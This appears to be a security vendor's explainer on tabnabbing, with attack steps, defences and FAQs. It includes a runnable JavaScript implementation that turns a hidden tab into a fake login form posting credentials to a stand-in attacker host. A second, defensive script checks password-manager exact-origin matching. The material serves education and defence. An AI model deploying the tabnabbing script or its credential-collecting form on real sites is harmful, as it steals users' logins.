Category: Deception & Impersonation

Tabnabbing in the browser

Tabnabbing is a deception technique in which a page the user already has open in a background tab rewrites itself into a fake login page, betting that the user will come back later, assume the session expired, and type credentials into it.

Quick answer

It exploits normal tabbed browsing habits: users keep many tabs open and rarely re-check the address bar when they come back to one they opened earlier.

For risky links and login flows, isolation keeps the page off the endpoint by running it in a disposable container and streaming only the rendered output to the user.

When you need this

  • You’ve seen indicators of this threat in your environment.
  • Users frequently click unknown links as part of daily work.
  • You need a control that reduces risk without relying on perfect user judgment.

Last updated

2026-01-29

How it usually happens in the browser

  • A user opens a page that looks legitimate or innocuous at load time, so link scanners and a quick glance both pass it.
  • Once the tab loses focus (the page can observe this through the Page Visibility API's visibilitychange event or a window blur), a script waits and then rewrites the page body, title and favicon to copy a well-known service's login screen.
  • The familiar icon and title in the tab strip are the point: they make the tab look like one the user opened themselves.
  • When the user returns, they assume they were logged out and re-enter credentials, which are posted to the attacker's server.
  • A related variant, reverse tabnabbing, works from the other direction: a page opened with target="_blank" and no rel="noopener" can use window.opener to navigate the original tab to a phishing page while the user reads the new one.
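The sequence above, as an added example that is not code from the original page: a page script that stays innocuous while the tab is visible, then swaps title, favicon and body once the tab has been hidden for a set delay. The service name, favicon URL and collection endpoint are constructed placeholders, and the document is injected so the same logic runs in a browser or against the small stand-in DOM and manual timers at the bottom of the block (both constructed for offline runs).

```javascript
// Added illustration, not code from the original page: the classic tabnabbing
// sequence as a page script. Service and attacker names are constructed.
// The "document" is injected so the same logic runs in a browser or against
// the small stand-in DOM at the bottom of this block.
'use strict';

// Builds the lure: a credential form posting to an attacker-chosen URL.
function buildFakeLogin(serviceName, collectUrl) {
  return `<h1>Sign in to ${serviceName}</h1>` +
    '<p>Your session has expired. Please sign in again.</p>' +
    `<form method="POST" action="${collectUrl}">` +
    '<input name="user" placeholder="Email">' +
    '<input name="pass" type="password" placeholder="Password">' +
    '<button type="submit">Sign in</button></form>';
}

// Swaps title, favicon and body so the background tab looks like a login page.
function nabTab(doc, service) {
  doc.title = `Sign in - ${service.name}`;
  let icon = doc.querySelector('link[rel="icon"]');
  if (!icon) {
    icon = doc.createElement('link');
    icon.setAttribute('rel', 'icon');
    doc.head.appendChild(icon);
  }
  icon.setAttribute('href', service.favicon);
  doc.body.innerHTML = buildFakeLogin(service.name, service.collectUrl);
}

// The trigger: the page only changes after it has been hidden for delayMs, so
// it is clean at load time and while the user is looking at it. schedule and
// cancel default to browser timers; the offline run below passes manual ones.
function installTabnabber(doc, service, opts = {}) {
  const delayMs = opts.delayMs || 30000;
  const schedule = opts.schedule || setTimeout;
  const cancel = opts.cancel || clearTimeout;
  let pending = null;
  doc.addEventListener('visibilitychange', () => {
    if (doc.visibilityState === 'hidden' && pending === null) {
      pending = schedule(() => { pending = null; nabTab(doc, service); }, delayMs);
    } else if (doc.visibilityState === 'visible' && pending !== null) {
      cancel(pending); // user came back early: stay innocuous
      pending = null;
    }
  });
}

// ---- Minimal stand-in for the DOM pieces used above (constructed) ----
class FakeElement {
  constructor(tag) { this.tag = tag; this.attrs = {}; this.children = []; this.innerHTML = ''; }
  setAttribute(k, v) { this.attrs[k] = v; }
  getAttribute(k) { return k in this.attrs ? this.attrs[k] : null; }
  appendChild(c) { this.children.push(c); return c; }
}
class FakeDocument {
  constructor() {
    this.title = 'Quarterly report';
    this.visibilityState = 'visible';
    this.head = new FakeElement('head');
    this.body = new FakeElement('body');
    this.body.innerHTML = '<p>Some ordinary article text.</p>';
    this.listeners = {};
  }
  createElement(tag) { return new FakeElement(tag); }
  querySelector(sel) { // only the one selector the script uses
    if (sel !== 'link[rel="icon"]') return null;
    return this.head.children.find(c => c.tag === 'link' && c.attrs.rel === 'icon') || null;
  }
  addEventListener(type, fn) { (this.listeners[type] = this.listeners[type] || []).push(fn); }
  setVisibility(state) { this.visibilityState = state; (this.listeners.visibilitychange || []).forEach(fn => fn()); }
}
// Deterministic timers so the hidden interval can be driven by hand.
class ManualTimers {
  constructor() { this.queue = new Map(); this.nextId = 1; }
  schedule(fn, ms) { const id = this.nextId++; this.queue.set(id, { fn, ms }); return id; }
  cancel(id) { this.queue.delete(id); }
  advance(ms) { for (const [id, t] of [...this.queue]) if (t.ms <= ms) { this.queue.delete(id); t.fn(); } }
}

// Runs the sequence: tab hidden for hiddenForMs, then the user returns.
// Returns what the user would see in the tab strip and on the page.
function simulate(hiddenForMs) {
  const doc = new FakeDocument();
  const timers = new ManualTimers();
  const service = { name: 'ExampleMail', favicon: 'https://attacker.example/mail.ico',
                    collectUrl: 'https://attacker.example/collect' };
  installTabnabber(doc, service, { delayMs: 30000,
    schedule: timers.schedule.bind(timers), cancel: timers.cancel.bind(timers) });
  doc.setVisibility('hidden');
  timers.advance(hiddenForMs);
  doc.setVisibility('visible');
  const icon = doc.querySelector('link[rel="icon"]');
  return { title: doc.title,
           hasLoginForm: doc.body.innerHTML.includes('type="password"'),
           favicon: icon ? icon.getAttribute('href') : null };
}

console.log('away 60s:', simulate(60000)); // swapped
console.log('away 5s :', simulate(5000));  // untouched
```

The two runs at the end show why load-time scanning and a quick look at the open tab both miss it: nothing in the DOM changes until the tab has been out of view longer than the delay, and a user who returns early sees the original page.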

What traditional defenses miss

  • Users don't expect a page to change after they stop interacting with it, so a rewritten tab inherits the trust they gave the original.
  • URL filters and link scanners that judge the page at load time may pass it, because the malicious rewrite happens later, in the client.
  • Awareness training focuses on inspecting links and email before the click, not on a tab that changes after it.

How isolation changes the game

  • Isolation reduces endpoint exposure to dynamic scripts on untrusted sites and makes risky sessions disposable.
  • Policy-based isolation can cover "unknown destinations", which is where tabnabbing payloads commonly live.
  • Discarding the isolated session when it ends removes the rewritten page along with any cookies or cached state left over from the risky browsing.

Operational checklist

  • Isolate unknown domains and common ad/redirect sources by default.
  • Encourage password managers that autofill only on the exact origin the credential was saved for; a manager that stays silent on a login prompt is itself a warning sign.
  • Limit or block third-party scripts where possible; use stricter content policies for risky browsing.
  • Serve links to untrusted sites with rel="noopener" (current browsers apply it by default for target="_blank", but set it explicitly) so an opened page cannot navigate the tab that opened it.
  • Teach users to re-check the domain on unexpected login prompts, even in a tab they opened themselves.
  • Prioritize phishing-resistant MFA for critical apps to reduce the impact of a captured password.
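The password-manager item above, as an added example that is not code from the original page: the exact-origin rule a manager applies when deciding whether a saved login belongs on the page, compared with the "does the address mention the service" check a rushed user makes by eye. The vault, the login-prompt URLs and the hostnames are constructed; real managers vary in how they match (some fill on the registrable domain rather than the full origin), so this shows the strict form.

```javascript
// Added illustration, not code from the original page: the "exact origin"
// rule a password manager applies, and why it defeats the lookalike tabs
// tabnabbing produces. Vault contents and URLs are constructed.
'use strict';

// Constructed vault keyed by origin (scheme + host + port).
const VAULT = new Map([
  ['https://accounts.example.com', { user: 'alice@example.com' }],
]);

// What a rushed user does by eye: "does the address mention the service?"
// Kept only as the contrast; it accepts the attacker-subdomain case below.
// (The homoglyph case fools the eye but not a byte comparison, so this
// function returns false for it while a human would say yes.)
function looksLikeService(url, serviceHost) {
  return url.toLowerCase().includes(serviceHost);
}

// Exact-origin decision. Returns the saved account or null plus a reason,
// so the caller can explain why no autofill happened.
function autofillDecision(url) {
  let parsed;
  try { parsed = new URL(url); } catch (e) { return { fill: null, reason: 'malformed-url' }; }
  if (parsed.protocol !== 'https:') return { fill: null, reason: 'insecure-scheme' };
  // parsed.origin is normalised: lowercase, default port dropped, IDN host
  // converted to punycode, so a homoglyph host never equals the stored key.
  const account = VAULT.get(parsed.origin);
  if (!account) return { fill: null, reason: 'no-account-for-origin:' + parsed.origin };
  return { fill: account, reason: 'exact-origin-match' };
}

// Constructed login prompts a returning user might face.
const PROMPTS = [
  'https://accounts.example.com/login?next=%2Fmail',   // the real site
  'https://accounts.example.com.evil.test/login',       // attacker subdomain trick
  'http://accounts.example.com/login',                  // downgraded scheme
  'https://accounts.example.com:8443/login',            // different port
  'https://accounts.ex\u0430mple.com/login',            // Cyrillic 'a' homoglyph
];

function evaluatePrompts(prompts) {
  return prompts.map(u => ({ url: u,
                             eyeball: looksLikeService(u, 'accounts.example.com'),
                             manager: autofillDecision(u) }));
}

for (const r of evaluatePrompts(PROMPTS)) console.log(r);
```

Only the first prompt gets a fill; every lookalike comes back with a reason rather than a credential, which is exactly the signal a user should read as "this is not the tab I think it is".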

FAQs

Is tabnabbing still a real threat?

Yes. It is a lightweight technique that can be embedded in otherwise normal web pages and relies on user habits rather than on a browser vulnerability: any page that can run script can do it.

How can users protect themselves?

Use a password manager, avoid entering credentials after returning to an old tab, and verify the domain for unexpected login prompts.

Does isolation stop tabnabbing?

It reduces risk by containing untrusted scripts away from the endpoint and making those sessions disposable, but domain controls and strong auth still matter.

Is this the same as session hijacking?

No. Tabnabbing tricks the user into giving up credentials. Session hijacking steals or reuses an existing authenticated session.
